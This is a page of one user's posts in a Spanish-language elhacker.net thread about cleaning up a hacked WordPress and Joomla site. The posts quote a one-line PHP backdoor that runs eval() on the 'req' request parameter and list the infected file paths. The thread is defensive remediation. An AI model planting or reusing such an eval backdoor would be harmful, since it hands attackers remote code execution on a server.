elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 21
31  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 17:28 pm
Cita de: MinusFour en 25 Julio 2014, 17:15 pm
Lo único que recomiendo es que los admins y usuarios con permisos tengan passwords únicas y seguras. De las urls de joomla no pude encontrar nada más, las examine todas porque eran pocas y fuera de esas entradas raras no encontre nada.

De wordpress muchas llamadas a un archivo systemcash.php y me parece que dijo #!drvy que lo habían borrado. Puede ser que el archivo haya sido subido por FTP pero obviamente esto no aparecera en el log de apache.

Esto lo he visto en otro foro, posts desde hace un mes:

http://www.webhostingtalk.com/showthread.php?t=1387485


Ah ok. Gracias. Justo hoy entro al Joomla y pide actualizarse otra vez a la versión 3.3.3 cuando ayer la he actualizado a la 3.3.2 me pareció muy raro no?. Lo peor de todo es que no me deja actualizar ahora me arroja:
ERROR: The archive file is corrupt, truncated or archive parts are missing Joomla 3.3.3.

Voy a esperar un poco más haber si se repara, o sino trataré de actualizarlo manualmente y no de forma automática como probé ahora (aunque de esta forma NUNCA tuve problemas)
32  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 16:37 pm
Cita de: MinusFour en 25 Julio 2014, 07:46 am
Parece ser que el 4 de julio le hicieron un ataque de fuerza bruta a la pagina de login de wordpress. Un ataque de mas de 9000 intentos en dos horas... pero no estoy seguro si consiguieron la password o no. Por lo que veo cuando el usuario se loguea lo redirecionan a wp-admin y nunca paso esto, pero a saber si el programita sigue los headers del HTTP.

Y bueno, esto es una lotería igual. Con todo lo que tocamos ayer, espero que haya "tapado" al menos por un tiempo. El Wordpress y el Joomla están actualizados. #!drvy
 pudo limpiar los virus y creo que estaría todo "OK".

O que más aconsejan? Moverle el login a otra parte? o algo así?
Los sigo escuchando muchachos. GRACIAS!
33  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 05:20 am
Cita de: #!drvy en 25 Julio 2014, 05:06 am
He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos

Y bueno entonces si ya está todo al parecer? Creo que debería estar todo OK y sin problemas, espero que por un buen tiempo
Que no venga MinusFour a decir unas líneas más jajajaja.
He actualizado el Joomla de peritaje de arte a la versión 3.3.2 (La última que me recomendaba!!!)

Si hemos terminado aqui, quiero darle las gracias por todo su tiempo, esfuerzo y dedicación para un "desconocido" como yo. Tanto a ti como a MinusFour, sin duda, valoro muchísimo su tiempo y les agradezco de corazón la ayuda prestada!!!

Si estarían por aqui los invitaría una cerveza a cada uno xDD.

Bueno espero que hayamos terminado, Y MIL GRACIAS!!
34  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 05:04 am
Cita de: #!drvy en 25 Julio 2014, 05:00 am
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

Código:
/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=

Saludos

Uff, que mal. Tienes razón con que es un nido de malware esto!!
Debo comentarlas como has hecho tu o lo estás modificando vos?
Como tienes el acceso no se si solo lo ves, o lo estás modificando jajaj. Avisame asi si no lo modificas tu, lo hago yo.
Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...
35  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:59 am
Cita de: #!drvy en 25 Julio 2014, 04:50 am
Si se me olvido mencionarlo..

El archivo esta en

peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php

La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código
  1. <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD

Saludos

MUCHAS GRACIAS POR LA ACLARACIÓN Y POR TODO. Como dijo MinusFour, espero que esa línea no la utilicen para nada no?

Cita de: MinusFour en 25 Julio 2014, 04:54 am
¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.

Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.

Del mismo archivo dices o de cual?
Debo comentarlas tambien como hizo arriba !#drvy??
36  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:49 am
Cita de: #!drvy en 25 Julio 2014, 04:44 am
En el archivo litermalmente pone esto:

Código:
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: He comentado la linea.. no debería dar mas problemas.

Saludos

#!drvy con esto quieres que decir que está TODO SOLUCIONADO?
Me podrías decir qué linea era y de que archivo por favor así miro la línea que has comentado. Me gustaría saber que línea habia antes y compararla con la que has puesto ahora. Despues de semejante post y horas aquí, quiero seguir aprendiendo un poco.

Yo estaba tratando de acceder al Administrador de Joomla, pero no me ha pasado los datos de esa parte, solo la de Wordpress ¬¬ y quería ver que versión tenía instalada. Porque pensé que si la Wordpress tenia la versión vieja, seguramente la de Joomla también y eso repararía el error no creen?
37  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:36 am
Cita de: MinusFour en 25 Julio 2014, 04:32 am
Seria muy facil subir un script ahi por medio de file_get_contents() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD.

Trato de intentar entender lo que dices, pero se me complica mucho.
Como puedo corregir eso de la variable que dices?? En que archivo se encuentra?
Gracias Minus
38  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:27 am
Cita de: MinusFour en 25 Julio 2014, 04:24 am
Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.

Veremos que dice #!drvy de eso.
Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-.
Ojala podamos encontrar la vulnerabilidad que han dicho arriba
39  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:05 am
Cita de: #!drvy en 25 Julio 2014, 04:01 am
Lo mas raro de todo es que si estas logueado, si que puedes visualizar el tema perfectamente.. pero si no estas logueado, ves la plantilla esa...


Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento.

Ahora toca mirar la vulnerabilidad esa..

Saludos

Estoy que casi me pongo a llorar de la emoción. Ahora si la visualizo perfectamente.
Muchas gracias #!drvy y tambien a ti MinusFour, lo he dicho mil veces pero igual, GRACIAS GRACIAS Y GRACIAS!!.

Con respecto a la web esa de peritajedearte, está hecho en Joomla como ha dicho MinusFour creo, al menos el favicon aparece con el logo. Quizás este desactualizado también o no sé. Estás seguro que hay un agujero ahí??
Avisenme si necesitan algo!!
40  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 03:54 am
Cita de: #!drvy en 25 Julio 2014, 03:50 am
He mirrado el error-log.txt son unos 57mb y toooooooooodas las entradas son del tipo esto:

Código:
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Zend Optimizer requires Zend Engine API version 220060519.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] The Zend Engine API version 220090626 which is installed, is newer.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Contact Zend Technologies at http://www.zend.com/ for a later version of Zend Optimizer.

Raro xD

Saludos

#!drvy Ella me ha comentado que trabaja o trabajaba con un programador y tambien los que le han dicho al principio de que tenía un virus fue gente del servidor. No pueden ser la IP de ellos? O lo que se ve ahí en el log son "ataques precisos"??

Con respecto a la web, si la he actualizado a la 3.9.1 y el template o tema, no esta adaptado para esa versión, significa que jodimos la web no??

Quiero ayudarlos pero no sé como...
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 21
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines